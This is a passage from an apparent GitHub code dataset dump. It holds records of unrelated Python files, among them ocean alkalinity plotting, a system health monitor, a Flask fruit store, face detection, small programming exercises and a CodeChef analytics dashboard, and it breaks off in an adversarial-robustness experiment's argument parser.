xr.open_dataset('data/results/3_po75-25_di2e-9/water.nc')\n ds3 = xr.open_dataset('data/results/4_po75-25_di5e-9/water.nc')\n ds4 = xr.open_dataset('data/results/5_po75-25_di10e-9/water.nc')\n\n def get_var_data_time(dtsts, varname):\n varflux_bottom_july, var_mean = [], []\n for i, ds in enumerate(dtsts, start=0):\n varflux_df = ds[varname].to_dataframe()\n varflux_bottom = varflux_df.groupby('z_faces').get_group(2.5)\n varflux_bottom = varflux_bottom.reset_index('z_faces', drop=True)\n varflux_bottom_july.append(varflux_bottom['2011-07-01':\n '2011-08-01'])\n varflux_bottom_july[i] = varflux_bottom_july[i].reset_index()\n var_mean.append(varflux_bottom_july[i][varname].mean())\n return np.array(var_mean), varflux_bottom_july\n\n dtsts = [ds1, ds2, ds3, ds4]\n alk, alkflux_bottom_july = get_var_data_time(dtsts, 'B_C_Alk _flux')\n nh4, nh4flux_bottom_july = get_var_data_time(dtsts, 'B_NUT_NH4 _flux')\n no2, no2flux_bottom_july = get_var_data_time(dtsts, 'B_NUT_NO2 _flux')\n no3, no3flux_bottom_july = get_var_data_time(dtsts, 'B_NUT_NO3 _flux')\n po4, po4flux_bottom_july = get_var_data_time(dtsts, 'B_NUT_PO4 _flux')\n so4, so4flux_bottom_july = get_var_data_time(dtsts, 'B_S_SO4 _flux')\n h2s, h2sflux_bottom_july = get_var_data_time(dtsts, 'B_S_H2S _flux')\n s0, s0flux_bottom_july = get_var_data_time(dtsts, 'B_S_S0 _flux')\n s2o3, s2o3flux_july = get_var_data_time(dtsts, 'B_S_S2O3 _flux')\n s_total = h2s + s0 + 2*s2o3\n x = np.array([1e-9, 2e-9, 5e-9, 10e-9])\n\n fig = plt.figure(figsize=cm2inch(8.5, 6), constrained_layout=True)\n ax = fig.add_subplot(1, 1, 1)\n ax.plot(x, alk, linewidth=LNW, label=r'alkalinity flux')\n ax.plot(x, s_total, linewidth=LNW, label=r'sulfur flux')\n ax.set_ylim(0, 19)\n\n ax.set_ylabel('Flux, mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n ax.set_xlabel('$kz_{dispersion}$, m$^2$ s$^{-1}$', fontsize=FNTSZ)\n\n ax.legend(loc='upper left', title='Fluxes',\n fontsize=LGNDSZ, title_fontsize=LGNDSZ)\n plt.show()\n\n\ndef plot_caco3():\n\n ds = xr.open_dataset('data/results/5_po75-25_di10e-9/water.nc')\n\n alkflux_df = ds['B_C_Alk _flux'].to_dataframe()\n biogrow_df = ds['B_BIO_GrowthPhy'].to_dataframe()\n omresp_df = ds['B_BIO_DcPOM_O2'].to_dataframe()\n alk_df = ds['B_C_Alk'].to_dataframe()\n\n alkflux_bottom = alkflux_df.groupby('z_faces').get_group(2.5)\n alkflux_bottom = alkflux_bottom.reset_index('z_faces', drop=True)\n omresp_bottom = omresp_df.groupby('z').get_group(2.4749999046325684)\n omresp_bottom = omresp_bottom.reset_index('z', drop=True)\n biogrow_surfac = biogrow_df.groupby('z').get_group(0.625)\n biogrow_surfac = biogrow_surfac.reset_index('z', drop=True)\n alk_surface = alk_df.groupby('z').get_group(0.625)\n alk_surface = alk_surface.reset_index('z', drop=True)\n alk_surface_year = alk_surface[START:STOP].reset_index()\n\n year = (('2011-01-01', '2011-01-31'), ('2011-02-01', '2011-02-28'),\n ('2011-03-01', '2011-03-31'), ('2011-04-01', '2011-04-30'),\n ('2011-05-01', '2011-05-31'), ('2011-06-01', '2011-06-30'),\n ('2011-07-01', '2011-07-31'), ('2011-08-01', '2011-08-31'),\n ('2011-09-01', '2011-09-30'), ('2011-10-01', '2011-10-31'),\n ('2011-11-01', '2011-11-30'), ('2011-12-01', '2011-12-31'))\n\n year_days = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\n alk_year_delta = []\n alk_year = []\n bio_year = []\n res_year = []\n for month in year:\n alk_delta_month = alk_surface[month[0]:month[1]]\n alk_month = alkflux_bottom[month[0]:month[1]]\n bio_month = biogrow_surfac[month[0]:month[1]]\n res_month = omresp_bottom[month[0]:month[1]]\n alk_year_delta.append(alk_delta_month['B_C_Alk'][0])\n alk_year.append(alk_month['B_C_Alk _flux'].mean())\n bio_year.append(bio_month['B_BIO_GrowthPhy'].mean())\n res_year.append(res_month['B_BIO_DcPOM_O2'].mean())\n\n bio_year_quotas = np.array(bio_year)/sum(bio_year)\n res_year_quotas = np.array(res_year)/sum(res_year)\n caco3_precipitation = bio_year_quotas*1000/year_days\n caco3_dissolution = res_year_quotas*1000/year_days\n ca_flux = caco3_dissolution - caco3_precipitation\n ca_array = np.array(ca_flux)/2.5*2\n\n alk_array = np.array(alk_surface_year['B_C_Alk'])\n alkflux_bottom_year = alkflux_bottom[START:STOP].reset_index()\n\n calpart = np.zeros(365)\n day = 0\n last_entry = 0\n for month, increment in zip(year_days, ca_array):\n temp = np.linspace(last_entry+increment,\n last_entry+increment*month, num=month)\n calpart[day:day+month] = temp\n last_entry = temp[-1]\n day += month\n\n result_array = alk_array + calpart\n\n caco3_dis = np.zeros(365)\n day = 0\n for month, increment in zip(year_days, caco3_dissolution):\n caco3_dis[day:day+month] = increment\n day += month\n\n caco3_pre = np.zeros(365)\n day = 0\n for month, increment in zip(year_days, caco3_precipitation):\n caco3_pre[day:day+month] = increment\n day += month\n\n fig = plt.figure(figsize=(12, 10))\n ax1 = fig.add_subplot(2, 1, 1)\n ax2 = fig.add_subplot(2, 1, 2)\n\n ax1.xaxis_date()\n ax2.xaxis_date()\n ax1.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n ax2.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n\n ax1.plot(alk_surface_year['time'], caco3_dis*2,\n label='CaCO$_3$ dissolution')\n ax1.plot(alk_surface_year['time'], caco3_pre*2,\n label='CaCO$_3$ precipitation')\n ax1.plot(alk_surface_year['time'], alkflux_bottom_year['B_C_Alk _flux'],\n label='Modelled TA flux at the SWI')\n ax1.plot(alk_surface_year['time'],\n caco3_dis*2+alkflux_bottom_year['B_C_Alk _flux'], linewidth=2,\n label=r'CaCO$_3$ dissolution + TA flux at the SWI')\n ax1.set_ylabel('TA fluxes, mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n ax1.legend(fontsize=LGNDSZ, title_fontsize=LGNDSZ,\n loc=\"best\", borderaxespad=0)\n\n ax2.plot(alk_surface_year['time'], calpart-calpart.min(), linewidth=2,\n label=r'Due to CaCO$_3$ dissolution/precipitation')\n ax2.plot(alk_surface_year['time'], alk_array-alk_array.min(), linewidth=2,\n label=r'From the model calculations')\n ax2.plot(alk_surface_year['time'], result_array-result_array.min(),\n linewidth=2, label=r'CaCO$_3$ + model calculations')\n ax2.set_ylabel('Relative TA, mmol m$^{-3}$', fontsize=FNTSZ)\n ax2.legend(fontsize=LGNDSZ, title_fontsize=LGNDSZ,\n loc=\"best\", borderaxespad=0)\n\n labels = ('(A) ', '(B)')\n for i, axis in enumerate((ax1, ax2)):\n axis.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n axis.text(X_TEXT, Y_TEXT, labels[i], transform=axis.transAxes,\n fontsize=FNTSZ, fontweight='bold', va='top', ha='right')\n plt.show()\n\n\nif __name__ == \"__main__\":\n plot_intro()\n # plot_alkalinity_flux_low_high()\n # plot_alkalinity_flux_sulfur_oxidation()\n # plot_alkalinity_flux_porosities1_2_3()\n # plot_alk_sulfur_fluxes()\n # plot_caco3()\n","repo_name":"limash/Alkalinity_in_the_Wadden_Sea","sub_path":"src/prepared_plots.py","file_name":"prepared_plots.py","file_ext":"py","file_size_in_byte":20721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30860822247","text":"from fractions import Fraction\n\ninfile = open(\"casino.in\", \"r\")\noutfile = open(\"casino.out\", \"w\")\n\nn, m, k, c, l = [int(x) for x in infile.readline().strip().split()]\nwheel = [[0 for i in range(26)] for j in range(n)]\nfor i in range(n):\n for v in infile.readline().strip():\n wheel[i][ord(v)-ord('A')] += 1\n\nans = 0\nfor i in range(c):\n s, pay = infile.readline().strip().split()\n pay = int(pay)\n cnt = 1\n for i in range(n):\n if s[i] == '*':\n cnt *= m\n else:\n cnt *= wheel[i][ord(s[i])-ord('A')]\n ans += Fraction(pay * cnt, m ** n)\n\nif ans > 1:\n ans -= 1\n outfile.write(\"{}/{}\\n\".format(ans.numerator, ans.denominator))\n outfile.write(\"{}\\n\".format(l))\n outfile.write(\"{}\\n\".format(\" \".join([str(x+1) for x in range(l)])))\nelse:\n outfile.write(\"0/1\\n\")\n outfile.write(\"0\\n\")\n\n\n","repo_name":"ehnryx/acm","sub_path":"asc19-cf100324/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"9629243972","text":"# written by Lekhraj(USD) pandeylekhraj4447@gmail.com\n#importing libraries main library is psutil midas.client communicates with odb page \n\nimport psutil\nimport numpy as np\nimport os\nimport pytz\nfrom datetime import datetime\nfrom pytz import timezone\nimport midas.client\nimport socket\nimport json\nimport os.path\n\n#connecting my script to odb\nclient = midas.client.MidasClient(\"pytest\")\n\n#for getting time \ntz_Pac = pytz.timezone('US/Pacific')\ndatetime = datetime.now(tz_Pac)\ndatetime= datetime.strftime('%a %b %d %H:%M:%S %Z %Y')\n#print(datetime)\n#get hostname\nhostoutput= socket.gethostname()\nhostoutput=hostoutput.split('.')[0]\n#path inside midas client is path in the odb where the threshold comparable values comes from odb page\nODBTest=client.odb_get(\"/HealthMonitoring/ComputerMonitoring/ThresholdControl/\"+hostoutput+\"/ODB_Test_Value\")\nODB_test_variable=int(ODBTest)\nDiskSpaceThreshold=client.odb_get('/HealthMonitoring/ComputerMonitoring/ThresholdControl/'+hostoutput+'/NumDiskaboveTest_Value')\nMeanProcessorThreshold=client.odb_get('/HealthMonitoring/ComputerMonitoring/ThresholdControl/'+hostoutput+'/MeanCPUutilThreshold')\nMemThreshold=client.odb_get('/HealthMonitoring/ComputerMonitoring/ThresholdControl/'+hostoutput+'/MemUtilThreshold')\n\n\n\ndef disk_partition():\n\n ''' We are using library psutil and trying to get detail of disk partions. We are finding\n total number of partitions, maximum usgae and minimum usage. Also, we keep ODB_test_variable and try\n to get disk partion higher then ODB_test_variable\n\n '''\n \n num_of_partitions = 0\n higher_than_threshold = 0\n max_usage = 0\n min_usage =100\n #print('Threshold Percentage Value for Disk = {} % '.format(str(ODB_test_variable)))\n #templ = \"%-17s %8s %8s %8s %5s%% %9s %s\"\n #print(templ % (\"Device\", \"Total\", \"Used\", \"Free\", \"Use \", \"Type\",\n # \"Mount\"))\n templ=\"%-17s %5s%%\"\n filesystem=[]\n usedpercent=[]\n for part in psutil.disk_partitions(all=False):\n #print(os.name)\n if os.name == 'nt':\n if 'cdrom' in part.opts or part.fstype == '':\n # skip cd-rom drives with no disk in it; they may raise\n # ENOENT, pop-up a Windows GUI error for a non-ready\n # partition or just hang.\n continue\n usage = psutil.disk_usage(part.mountpoint)\n templ % (\n filesystem.append(part.device),\n usedpercent.append(usage.percent))\n\n # FreeListPer= list(map(lambda x: round(100 - x,2), usedpercent))\n # print(filesystem)\n # print(usedpercent)\n # print(FreeListPer)\n for values in usedpercent:\n #print(df3_df['filesystem'],values)\n values = float(values)\n #print(values)\n #converting string into float\n num_of_partitions += 1\n if values > max_usage:\n max_usage =values\n # print(max_usage)\n if values < min_usage:\n min_usage =values\n # print(min_usage)\n if values > ODB_test_variable:\n higher_than_threshold += 1\n if higher_than_threshold < 1:\n higher_than_threshold = 0\n return [num_of_partitions, max_usage, min_usage, higher_than_threshold]\n\n \ndef Processor_Utilization():\n\n ''' We are using library psutil and trying to get detail of num of CPU used and their respective\ncpu utilization percentage. We are keeping maximum,minumium cpu utilization and number of cpu in webpage\n '''\n\n num_CPUs = psutil.cpu_count()\n CPUsUtilization_percent = psutil.cpu_percent(interval=1,percpu=True)\n MeanValue=sum(CPUsUtilization_percent)/len(CPUsUtilization_percent)\n MeanValue=round(MeanValue,3)\n return[num_CPUs,CPUsUtilization_percent,MeanValue] \n\n\ndef MemoryUtilization():\n # print('\\n\\n********Memory Utilization*********\\n\\n')\n ''' We are using library psutil and trying to get detail of virtual and swap\n memory using psutil.virtual_memory() and psutil.swap_memory(). We are finding\n ntotal memory in GB by converting bytes into GB and we are finding Memory Utilization\n (total -avialable)*100/total in term of percentage in case both of RAM and Swap \n '''\n\n Memory= psutil.virtual_memory()\n SwapMemory= psutil.swap_memory()\n MemTot= round(Memory.total/(1024**3),2)\n SwapMemTot= round(SwapMemory.total/(1024**3),2)\n MemPercent= Memory.percent\n SwapMemPercent= SwapMemory.percent\n return [MemTot, SwapMemTot, MemPercent, SwapMemPercent]\n\n# values from processor utilization, disk Space Utilization & memoryutilization \n\nProcessor_=Processor_Utilization()\ndisk_=disk_partition()\nMemory_=MemoryUtilization()\n\njson1={'hostname':hostoutput,'DiskSpaceUtilization':{'LastRead':datetime,'nmDiskSpaceChk':disk_[0],'MaxDiskSpaceChk%':disk_[1],'MinDiskSpaceChk%':disk_[2],'nmGtrThreshold':disk_[3]},'ProcessorUtilization':{'LastRead':datetime,'nmCPUs':Processor_[0],'MaxCPUutilized%':max(Processor_[1]),'MinCPUutilized%':min(Processor_[1]),'MeanCPUutilized%':Processor_[2]},'MemoryUtilization':{'LastRead':datetime,'MemoryUsed%':Memory_[1],'MemTotinGB':Memory_[0],'SwapMemoryused%':Memory_[3],'SwapMemTotinGB':Memory_[2]},'Alarm':[hostoutput,ODB_test_variable,DiskSpaceThreshold,MeanProcessorThreshold,MemThreshold,disk_[3],Processor_[2],Memory_[1]]}\n#print(json1)\n#Pathwhere the code is running\n#PathJson= os.path.join(os.getcwd())\n#print(PathJson)\nPathJson=\"/home/cdms/health_monitoring/Computermonitoring/SystemHealthMonitor/FinalCompMonitoring\"\nout_file = open(str(PathJson)+\"/Json/\"+ str(hostoutput) +\".json\", \"w\")\njson.dump(json1, out_file)\n\nout_file.close()\n\n","repo_name":"pandeylekhraj/SystemHealthMonitor","sub_path":"FinalCompMonitoring/ReturnJsonFileCompMonitor.py","file_name":"ReturnJsonFileCompMonitor.py","file_ext":"py","file_size_in_byte":5566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14062143390","text":"from flask import Flask, render_template, request, redirect\napp = Flask(__name__) \n\nimport time\n\n@app.route('/') \ndef index():\n return render_template(\"index.html\")\n\n@app.route('/checkout', methods=['POST']) \ndef checkout():\n strawberry = request.form[\"strawberry\"]\n raspberry = request.form[\"raspberry\"]\n blackberry = request.form[\"blackberry\"]\n apple = request.form[\"apple\"]\n fruits = {\"strawberry\":strawberry,\"raspberry\":raspberry,\"blackberry\":blackberry,\"apple\":apple}\n\n fname = request.form[\"first_name\"]\n lname = request.form[\"last_name\"]\n student_id = request.form[\"student_id\"]\n\n items = int(strawberry) + int(raspberry) + int(blackberry) + int(apple)\n\n localtime = time.asctime( time.localtime(time.time()) )\n\n return render_template(\"checkout.html\", fruits=fruits, fname=fname, lname=lname, student_id=student_id, items=items, localtime=localtime)\n\n@app.route('/fruits') \ndef fruits():\n fruits = [\"apple.png\", \"blackberry.png\", \"raspberry.png\", \"strawberry.png\"]\n return render_template(\"fruits.html\", fruits=fruits)\n\nif __name__==\"__main__\": \n app.run(debug=True) ","repo_name":"GustavoMonardez/python-flask-cd-fruit-store","sub_path":"fruit-store.py","file_name":"fruit-store.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15636549356","text":"#! /usr/bin/env python\nimport cv2\nimport sys\n\ndef find_face_image():\n\t# image to analyze/Cascade for opencv to perform analysis\n\timagePath = \"YourImagePath\"\n \n \t# You need to download this xml file. It's necessary for the program to run\n\tcascPath = \"/YourPath/haarcascade_frontalface_default.xml\"\n\n\t# Read the image and convert to grayscale\n\timage = cv2.imread(imagePath)\n\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n\t# Create the haar cascade. Used for algorithm to find faces\n\tface_cascade = cv2.CascadeClassifier(cascPath)\n\n\t# Detect faces in the image\n\tfaces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\tfor (x,y,w,h) in faces:\n\t cv2.rectangle(image,(x,y),(x+w,y+h),(255,0,0),2)\n\t roi_gray = gray[y:y+h, x:x+w]\n\t roi_color = image[y:y+h, x:x+w]\n\n\t# Print out how many faces were found in the image\n\tprint(\"Found {0} faces!\".format(len(faces)))\n\n\t# Show the image with the selected faces. If user enters ESC key then exit program\n\twhile True:\n\t\tcv2.imshow(\"Faces found\", image)\n\t\t\n\t\tif cv2.waitKey(1) & 0xFF == 27:\n\t\t\tbreak\n\n\tcv2.destroyAllWindows()\n","repo_name":"spencerneveux/FacialRecognition","sub_path":"detect_face.py","file_name":"detect_face.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9489547030","text":"import itertools\nN = input()\nN = int(N)\nAs = list(map(int,input().split(\" \")))\nans = 0\nl = 0\nr = 0\nbefore = 0\nwhile l< N:\n while N > r >= l and before self.your_power:\n print(\"我赢了!\")\n else:\n print(\"你赢了\")\n\n\n\n\n","repo_name":"chenrong1105/chenrong_zuoye","sub_path":"pythoncs/python_zuoye/zuoye2/zuoye2_TongLao.py","file_name":"zuoye2_TongLao.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38805992789","text":"# Need to create a Human class with attributes: name, surname, age, phone, address\n# Attributes must be filled in the __init__ method\n# You also need to write methods:\n#\n# get_info(self) - which returns a dictionary containing information about the person\n# call(self, phone_number) - which will output \"{self.phone} calling {phone_number}\"\n# You need to create 3 objects of the Human class and call the get_info method on them\n\n\nclass Human:\n\n def __init__(self, name: str, surname: str, age: int, phone: str, address: str):\n self.name = name\n self.surname = surname\n self.age = age\n self.phone = phone\n self.address = address\n\n def get_info(self):\n human_info = {\n 'name': self.name,\n 'surname': self.surname,\n 'age': self.age,\n 'phone': self.phone,\n 'address': self.address,\n }\n return human_info\n\n def call(self, phone_number):\n print(f'{self.phone} calling {phone_number}')\n\n\ninfo1 = Human('Bob', 'Dylan', 45, '+981234567890', 'Fulton St. 654')\ninfo2 = Human('Jim', 'Carrie', 59, '+380234342313', 'Lafayette Av. 12')\ninfo3 = Human('Mishel', 'Pfeiffer', 23, '+86783451242', 'St. Marks Pl. 1')\nprint(info1.get_info())\nprint(info2.get_info())\nprint(info3.get_info())\n\n","repo_name":"spasmx/hillel_aqa_rep","sub_path":"class_human_hw13.py","file_name":"class_human_hw13.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23590032002","text":"\"\"\"\n经典全组合 直接调用库函数 其实为了点进去看看他的实现代码\n\"\"\"\nimport itertools\n\n\nclass Solution:\n def subsets(self, nums):\n results = []\n for i in range(len(nums) + 1):\n for r in itertools.combinations(nums, i):\n results.append(list(r))\n return results\n\n\ns = Solution()\nprint(s.subsets([1, 2, 3]))\n","repo_name":"algorithm002/algorithm","sub_path":"Week_04/id_3/backtracking/LeetCode_78_3_v2.py","file_name":"LeetCode_78_3_v2.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"66"} +{"seq_id":"27933185025","text":"\n\nimport random\n\n\nboard = [[\" \" for _ in range(9)] for _ in range(9)]\npossible_board = [[[\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"] for _ in range(9)] for _ in range(9)]\n\ndef print_board(board):\n for line in board:\n print(line)\n\n#print_board(board)\n\ndef is_legal(to_check: list):\n to_check = [val for val in to_check if val != ' ']\n return len(to_check) == len(set(to_check))\n\ndef is_board_legal(board):\n for i in range(9):\n # Lines\n if not is_legal(board[i]):\n return False\n # Cols\n elif not is_legal([board[j][i] for j in range(9)]):\n return False\n # Cells\n j = i % 3 * 3\n i //= 3\n cell = [\n board[i][j], board[i][j+1], board[i][j+2],\n board[i+1][j], board[i+1][j+1], board[i+1][j+2],\n board[i+2][j], board[i+2][j+1], board[i+2][j+2]\n ]\n if not is_legal(cell):\n return False\n return True\n\ndef cells_with_no_choice(board):\n for line in possible_board:\n for possible in possible_board:\n if len(possible) == 0:\n return True\n return False\n\n\ndef update_cell_possibilities(modified_cell):\n pass\n\n'''\nboard = [\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n \n]\n'''\n\nwhile True:\n best_len = 10\n best = []\n for l, line in enumerate(board):\n for c, cell in enumerate(line):\n if len(possible_board[l][c]) < best_len:\n best_len = len(possible_board[l][c])\n best = [[l, c]]\n elif len(possible_board[l][c]) == best_len:\n best.append([l, c])\n \n chosen = random.choice(best)\n board[chosen[0]][chosen[1]] = random.choice(possible_board[chosen[0]][chosen[1]])\n","repo_name":"Mactywd/puzzles","sub_path":"sudoku/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7554761777","text":"# n! means n × (n − 1) × ... × 3 × 2 × 1\n\n# For example, 10! = 10 × 9 × ... × 3 × 2 × 1 = 3628800,\n# and the sum of the digits in the number 10! is 3 + 6 + 2 + 8 + 8 + 0 + 0 = 27.\n\n# Find the sum of the digits in the number 100!\n\nfrom math import factorial\n\nnumber = factorial(100)\ntotal = 0\n\nfor num in str(number):\n total += int(num)\n\nprint(total)\n","repo_name":"alexLaws/projectEuler","sub_path":"020problem.py","file_name":"020problem.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16965067718","text":"import dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport plotly.graph_objects as go\nfrom config import DATA_DIR\n\n\"\"\"\nQuestions\n\"\"\"\n\n\ndef plot_questions_tag_chart(df):\n fig = go.Figure([\n go.Bar(x=df[\"SubmissionCount\"], y=df[\"Tags\"], orientation=\"h\"),\n ])\n fig.update_layout(yaxis=dict(autorange=\"reversed\"))\n fig.update_layout(xaxis=dict(title=\"Total Number of Submissions by Tags\"))\n return fig\n\n\nquestions_df = pd.read_csv(DATA_DIR / \"codechef/questions.csv\", index_col=[0])\n\nquestions_df_with_count = questions_df.dropna(subset=[\"SubmissionCount\"]).copy()\nquestions_df_with_count[\"Tags\"] = questions_df_with_count[\"Tags\"].apply(lambda tags: eval(tags))\ntag_count_top_10 = questions_df_with_count \\\n .explode(\"Tags\") \\\n .groupby(\"Tags\")[\"SubmissionCount\"] \\\n .sum().sort_values(ascending=False)[:10]\nfig1 = plot_questions_tag_chart(pd.DataFrame(tag_count_top_10).reset_index())\n\n\"\"\"\nSolutions\n\"\"\"\n\n\ndef plot_submissions_tag_chart(df):\n fig = go.Figure([\n go.Bar(x=df[\"UserID\"], y=df[\"Language\"], orientation=\"h\"),\n ])\n fig.update_layout(yaxis=dict(autorange=\"reversed\"))\n fig.update_layout(xaxis=dict(title=\"Total Number of Submissions by Languages\"))\n return fig\n\n\nsolutions_df = pd.read_csv(DATA_DIR / \"codechef/solutions.csv\", index_col=[1])\nlanguage_count = solutions_df \\\n .reset_index()[[\"UserID\", \"Language\"]] \\\n .drop_duplicates() \\\n .groupby(\"Language\")[\"UserID\"] \\\n .count() \\\n .sort_values(ascending=False)[:10]\nfig2 = plot_submissions_tag_chart(pd.DataFrame(language_count).reset_index())\n\n\ndef plot_language_invalid_state_chart(df):\n status = df[\"Status\"].unique()\n sum_df = df.groupby(\"Language\").agg({\"SolutionID\": \"sum\"})\n sorted_index = sum_df.sort_values(\"SolutionID\", ascending=False).index\n percentage_df = df.groupby([\"Language\", \"Status\"]).agg({\"SolutionID\": \"sum\"}). \\\n div(sum_df, level=\"Language\"). \\\n reset_index(). \\\n set_index(\"Language\").loc[sorted_index]. \\\n reset_index()\n fig = go.Figure([\n go.Bar(\n name=state,\n x=percentage_df[percentage_df[\"Status\"] == state][\"Language\"],\n y=percentage_df[percentage_df[\"Status\"] == state][\"SolutionID\"],\n )\n for state in status])\n fig.update_layout(dict(barmode=\"stack\"))\n fig.update_layout(xaxis=dict(title=\"Types of Unsuccessful Submissions by Languages\"))\n return fig\n\n\nvalid_state = [\"accepted\", \"wrong answer\", \"internal error\", \"running..\", \"compiling..\", \"running judge..\"]\nsolutions_df_valid_state = solutions_df.dropna(subset=[\"Status\"]).reset_index()\ninvalid_state_count = solutions_df_valid_state[~solutions_df_valid_state[\"Status\"].isin(valid_state)] \\\n .groupby([\"Status\", \"Language\"])[\"SolutionID\"] \\\n .count() \\\n .reset_index()\ntop_languages_with_invalid_sum = pd.DataFrame(invalid_state_count\n .groupby(\"Language\")[\"SolutionID\"]\n .sum()\n .sort_values(ascending=False)[:10]).reset_index()\nstate_df = invalid_state_count[invalid_state_count[\"Language\"].isin(top_languages_with_invalid_sum[\"Language\"])]\nfig3 = plot_language_invalid_state_chart(state_df)\n\n\ndef plot_pie_chart(df, level_range):\n charts = []\n for level in level_range:\n fig = go.Figure(\n data=[go.Pie(\n labels=df.loc[level, \"SolutionStatus\"],\n values=df.loc[level, \"SolutionID\"],\n hole=.3,\n textinfo=\"label+percent\",\n marker=dict(colors=[\"red\", \"royalblue\"]))\n ],\n layout=dict(annotations=[\n {\n \"font\": {\n \"size\": 16,\n \"color\": '#5A5A5A'\n },\n \"showarrow\": False,\n \"text\": level,\n \"x\": 0.5,\n \"y\": 0.5\n }\n ])\n )\n fig.update(dict(layout_showlegend=False))\n charts.append(fig)\n return charts\n\n\nlevels = [\"beginner\", \"easy\", \"medium\", \"hard\", \"challenge\"]\nsolutions_df_levels = solutions_df.join(questions_df[\"level\"], on=\"QCode\")\nsolutions_df_levels.loc[solutions_df_levels[\"Status\"] == \"accepted\", \"SolutionStatus\"] = \"Passed\"\nsolutions_df_levels.loc[solutions_df_levels[\"Status\"] != \"accepted\", \"SolutionStatus\"] = \"Failed\"\nsolutions_df_levels = solutions_df_levels.groupby([\"level\", \"SolutionStatus\"])[\"SolutionID\"].count().reset_index()\nfigures = plot_pie_chart(solutions_df_levels.set_index(\"level\"), levels)\n\ncodechef_visualization = dbc.Container([\n html.H1(\"Codechef Competitive Programming Analytics\"),\n html.Hr(),\n dbc.Col([\n html.H3(\"Overview of Passing/Failing Submissions by Levels\"),\n dbc.Row(list(map(lambda figure: dcc.Graph(figure=figure, style=dict(width=f\"33%\")), figures[:3])),\n justify=\"center\"),\n dbc.Row(list(map(lambda figure: dcc.Graph(figure=figure, style=dict(width=f\"33%\")), figures[3:])),\n justify=\"center\"),\n html.H3(\"Detailed Submission Breakdown\"),\n dbc.Row([\n dcc.Graph(id=\"status-chart\", figure=fig3, style=dict(width=\"100%\")),\n ]),\n dbc.Row([\n dcc.Graph(id=\"tag-chart\", figure=fig1),\n dcc.Graph(id=\"language-chart\", figure=fig2)\n ], justify=\"center\")\n ], align=\"start\"),\n],\n fluid=True\n)\n","repo_name":"terryluzj/cs-information-visualization-assignments-python","sub_path":"routes/codechef/figure.py","file_name":"figure.py","file_ext":"py","file_size_in_byte":5690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39672950199","text":"import os, sys, datetime, time\nfrom comet_ml import Experiment\n\nimport argparse\n\nfrom learning.dataloader import get_loader, get_info\nfrom experiments.attacks import load_model, init_comet, abbrev_to_task, TASKONOMY_DATASET\nfrom models.mtask_losses import get_losses_and_tasks\nfrom utils.art.attacks.pytorch_mtask import mtask_forone_advacc\n\n\nparser = argparse.ArgumentParser(description='Run Adversarial attacks experiments')\nparser.add_argument('--arch', type=str, default=\"resnet18\")\nparser.add_argument('--dataset', type=str, default=\"taskonomy\")\nparser.add_argument('--model_root', type=str, default=None)\nparser.add_argument('--data_dir', type=str, default=TASKONOMY_DATASET)\nparser.add_argument('--train_task_set', default=\"ds\")\nparser.add_argument('--aux_task_set', default=\"\")\nparser.add_argument('--test_task_set', default=\"\")\nparser.add_argument('--target_task_set', default=\"\")\nparser.add_argument('--step_size', type=int, default=2)\nparser.add_argument('--epoch', type=str, default=\"150\")\nparser.add_argument('--test_batch_size',type=int, default=32)\nparser.add_argument('--classes',type=int, default=18)\nparser.add_argument('--epsilon',type=int, default=16)\nparser.add_argument('--workers',type=int, default=8)\nparser.add_argument('--pixel_scale',type=int, default=255)\nparser.add_argument('--steps', type=int, default=25)\nparser.add_argument('--debug', action='store_true')\nparser.add_argument('--timestamp', type=str, default=None)\nparser.add_argument('--strategy', type=str, default=\"None\")\nparser.add_argument('--name', type=str, default=\"robust-mtl-RQ2_2\")\nparser.add_argument('--norm', type=str, default=\"Linf\")\nparser.add_argument('--metrics', 